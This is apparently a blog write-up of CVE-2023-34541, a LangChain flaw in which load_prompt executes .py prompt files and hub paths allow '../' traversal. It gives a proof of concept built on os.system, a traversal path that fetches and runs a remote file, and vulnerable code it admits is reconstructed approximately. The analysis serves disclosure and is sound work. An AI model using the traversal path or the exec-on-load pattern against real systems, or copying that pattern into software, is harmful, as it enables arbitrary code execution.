LangChain Arbitrary Command Execution - CVE-2023-34541

 

Vulnerability Introduction

LangChain is a framework for developing applications driven by language models.

In affected versions of LangChain, the load_prompt function performs no security filtering on the content it loads from a prompt file. An attacker can therefore construct a prompt file containing malicious code and induce a user to load it, causing arbitrary system commands to be executed.



Vulnerability Reproduction

In the project directory, create test.py:

from langchain.prompts import load_prompt

if __name__ == '__main__':
    loaded_prompt = load_prompt("system.py")

In the same directory, create system.py, which executes the system command dir:

import os
os.system("dir")

Running test.py prints the result of executing the dir system command:

[Screenshot: output of test.py showing the directory listing produced by dir]

Vulnerability Analysis: _load_prompt_from_file

langchain.prompts.loading.load_prompt

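A minimal sketch of load_prompt's vulnerable logic, reconstructed from the 0.0.x source (details approximate):

def load_prompt(path):
    """Load a prompt from LangChainHub or the local filesystem."""
    # try_load_from_hub returns None when the path is not an lc:// hub path,
    # so a plain local path falls through to _load_prompt_from_file.
    if hub_result := try_load_from_hub(
        path, _load_prompt_from_file, "prompts", {"py", "json", "yaml"}
    ):
        return hub_result
    else:
        return _load_prompt_from_file(path)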

try_load_from_hub attempts to load a file remotely from the given path, but because we are loading a local file it returns None, and execution jumps to _load_prompt_from_file.

langchain.prompts.loading._load_prompt_from_file

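A sketch of the dispatch logic, reconstructed from the vulnerable source; the .py branch follows the article's description, the surrounding details (including the hand-off to load_prompt_from_config for JSON/YAML) are approximate:

import json
from pathlib import Path

import yaml

def _load_prompt_from_file(file):
    """Load a prompt from a file, dispatching on the file suffix."""
    file_path = Path(file)
    if file_path.suffix == ".json":
        with open(file_path) as f:
            config = json.load(f)
    elif file_path.suffix == ".yaml":
        with open(file_path, "r") as f:
            config = yaml.safe_load(f)
    elif file_path.suffix == ".py":
        # The vulnerable branch: the raw bytes of the file are handed to
        # exec, so any Python in the file runs with the caller's privileges.
        with open(file_path, "rb") as f:
            exec(f.read())
        return None  # (return handling in the real code is elided here)
    else:
        raise ValueError(f"Got unsupported file type {file_path.suffix}")
    return load_prompt_from_config(config)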

_load_prompt_from_file dispatches on the file's suffix; when the suffix is .py, the file is read and passed to exec.

In other words, the vulnerable code path can be abbreviated as:

if __name__ == '__main__':
    file_path = "system.py"
    with open(file_path, "rb") as f:
        exec(f.read())

Vulnerability Analysis: try_load_from_hub

Due to network issues, this path could not be reproduced successfully, so here is a detailed analysis at the code level instead.

from langchain.prompts import load_prompt

if __name__ == '__main__':
    loaded_prompt = load_prompt("lc://prompts/../../../../../../../system.py")

langchain.prompts.loading.load_prompt

This time the lc:// path is treated as a hub path, so try_load_from_hub (sketched above) performs the load.

langchain.utilities.loading.try_load_from_hub

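A sketch of the hub-loading logic, reconstructed from the vulnerable 0.0.x source; the environment-variable names and default URL base are as I recall them and may differ:

import os
import re
import tempfile
from pathlib import Path
from urllib.parse import urljoin

import requests

DEFAULT_REF = os.environ.get("LANGCHAIN_HUB_DEFAULT_REF", "master")
URL_BASE = os.environ.get(
    "LANGCHAIN_HUB_URL_BASE",
    "https://raw.githubusercontent.com/hwchase17/langchain-hub/{ref}/",
)
HUB_PATH_RE = re.compile(r"lc(?P<ref>@[^:]+)?://(?P<path>.*)")

def try_load_from_hub(path, loader, valid_prefix, valid_suffixes, **kwargs):
    """Load a file from the hub; return None if path is not a hub path."""
    if not isinstance(path, str) or not (match := HUB_PATH_RE.match(path)):
        return None
    ref, remote_path_str = match.groups()
    ref = ref[1:] if ref else DEFAULT_REF
    remote_path = Path(remote_path_str)
    if remote_path.parts[0] != valid_prefix:
        return None
    if remote_path.suffix[1:] not in valid_suffixes:
        raise ValueError("Unsupported file type.")
    # The path is spliced into the URL without normalizing ".." segments.
    full_url = urljoin(URL_BASE.format(ref=ref), str(remote_path))
    r = requests.get(full_url, timeout=5)
    if r.status_code != 200:
        raise ValueError(f"Could not find file at {full_url}")
    # The fetched content is written to a temp file and handed to the
    # loader -- for a .py file that means it will eventually be exec'd.
    with tempfile.TemporaryDirectory() as tmpdirname:
        file = Path(tmpdirname) / remote_path.name
        with open(file, "wb") as f:
            f.write(r.content)
        return loader(str(file), **kwargs)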

The path is first matched against HUB_PATH_RE = re.compile(r"lc(?P<ref>@[^:]+)?://(?P<path>.*)"), so it must begin with lc://. The matched path is then validated: its first component must be the prompts prefix, and its file suffix must be one of {'py', 'yaml', 'json'}.

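A standalone demonstration (mirroring the sketch above) of why the traversal path passes both checks:

import re
from pathlib import Path

HUB_PATH_RE = re.compile(r"lc(?P<ref>@[^:]+)?://(?P<path>.*)")

match = HUB_PATH_RE.match("lc://prompts/../../../../../../../system.py")
remote_path = Path(match.group("path"))

print(remote_path.parts[0])    # 'prompts' -> prefix check passes
print(remote_path.suffix[1:])  # 'py'      -> in {'py', 'yaml', 'json'}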

Finally, when the request URL is spliced together, the ../../../ sequences can escape the project's path restrictions and point to a file we control; that file is then fetched, read, and loaded, achieving arbitrary command execution.
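To illustrate the splicing, here is what urljoin produces with the (assumed) default hub URL base from the sketch above; a modern Python resolves the ".." segments per RFC 3986, so the final request escapes the langchain-hub repository path entirely:

from urllib.parse import urljoin

URL_BASE = "https://raw.githubusercontent.com/hwchase17/langchain-hub/{ref}/"

full_url = urljoin(
    URL_BASE.format(ref="master"),
    "prompts/../../../../../../../system.py",
)
print(full_url)  # https://raw.githubusercontent.com/system.py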

Vulnerability Summary

Tested against the latest version at the time of writing, this vulnerability still exists. Its essence is that load_prompt can load and execute a local or remotely specified Python file. In practice, though, it should not be easy to exploit, because the attacker must control the path that is passed to load_prompt.

Support Links


Source: https://tutorialboy24.blogspot.com/2023/07/langchain-arbitrary-command-execution.html
